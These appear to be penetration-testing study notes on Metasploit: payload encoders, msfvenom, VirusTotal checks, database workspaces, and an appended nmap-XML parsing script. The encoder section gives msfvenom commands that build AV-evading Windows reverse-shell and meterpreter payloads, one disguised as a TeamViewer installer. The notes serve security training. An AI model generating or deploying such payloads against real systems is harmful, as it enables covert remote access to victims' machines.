# Encoders
- Encoders assist with making payloads compatible with different processor architectures while at the same time helping with AV evasion
- located in `/usr/share/metasploit-framework/modules/encoders`
- encoders support different processor architectures: x64, x86, sparc, ppc, mips
- `msfvenom` can be used for payload generation and encoding
```bash
#generating a payload w/o encoding
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
```
```bash
#generating a payload with encoding
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe #specify output file name
```
- an encoder can also be selected from within `msfconsole`
```bash
msf6 > search xxx
msf6 > use xxx #select exploit module
msf6 > show payloads #show payloads for selected exploit module
msf6 > set payload X
msf6 > show encoders #show encoders for selected exploit module
msf6 > set encoder Y
```
## MSF-Virustotal
- Metasploit tool that we can use with an API key to analyze our payloads with respect to AV evasion
- This requires free registration on VirusTotal
```bash
msf-virustotal -k <API key> -f TeamViewerInstall.exe #analyze payload for AV evasion with VirusTotal
```
# Databases
- Databases are used to keep track of results in MSF
- `msfconsole` has built-in support for PostgreSQL dbs
- Provides direct, quick, and easy access to scan results with the added ability to import and export results in conjunction with third-party tools
- DB entries can also be used to directly configure exploit module params with the already existing findings
## MSF DB Setup
```bash
sudo apt update && sudo apt install metasploit-framework #installs or upgrades MSF
sudo service postgresql status #shows status of db
sudo systemctl start postgresql #starts db
sudo msfdb init #initializes the MSF db
sudo msfdb status #shows status of MSF db
sudo msfdb run #start msfconsole and connect to MSF db
```
- reinitialize the msf db if we run into errors such as mismatched creds
```bash
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
```
## Using the MSF DB
- `msfconsole` includes integrated support for msfdb
- databases can be exported and imported
- workspaces act like folders for a project
```bash
msf6 > help database #shows msfconsole commands for msfdb
msf6 > workspace #shows current workspace with an *
msf6 > workspace -h #shows help menu for workspaces
msf6 > workspace -a test1 #creates test1 workspace
msf6 > workspace test1 #selects test1 workspace
msf6 > db_import Target.xml #imports an nmap xml file
msf6 > hosts #shows hosts based on imported nmap results (db table)
msf6 > services #shows services based on imported nmap results (db table)
msf6 > db_nmap -sV -sC <target_ip> #uses nmap from msfconsole
msf6 > hosts #shows hosts based on nmap results
msf6 > services #shows services based on nmap results
msf6 > db_export -h #shows help menu for db exports
msf6 > hosts -h #shows help menu for hosts
msf6 > services -h #shows help menu for services
msf6 > creds -h #shows help menu for credentials gathered
msf6 > loot -h #shows help menu for loot gathered
```
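To see what kind of data `db_import Target.xml` turns into the `hosts` and `services` tables, the sketch below parses an nmap `-oX` file into comparable rows. It is an added example, not Metasploit's own importer; the function name `parse_nmap_xml`, the row fields, and the sample scan (documentation addresses) are constructed for illustration.

```python
import xml.etree.ElementTree as ET  # for untrusted files, prefer the defusedxml package

# Constructed sample in nmap's -oX layout (not output from a real scan).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX Target.xml 192.0.2.0/30">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="443"><state state="open"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.0.2.11" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return (hosts, services) row lists built from nmap XML (hypothetical helper)."""
    hosts, services = [], []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # this sketch records only hosts that responded
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue  # no IPv4 address element, nothing to key the row on
        addr = addr_el.get("addr")
        name_el = host.find("hostnames/hostname")
        hosts.append({"address": addr,
                      "name": name_el.get("name") if name_el is not None else ""})
        for port in host.iter("port"):
            state_el = port.find("state")
            svc = port.find("service")  # absent when nmap did not identify the service
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            services.append({
                "host": addr, "port": int(port.get("portid")), "proto": port.get("protocol"),
                "state": state_el.get("state") if state_el is not None else "unknown",
                "name": svc.get("name") if svc is not None else "",
                "info": " ".join(p for p in parts if p)})
    return hosts, services


if __name__ == "__main__":
    for row in sum(parse_nmap_xml(SAMPLE_NMAP_XML), []):
        print(row)
```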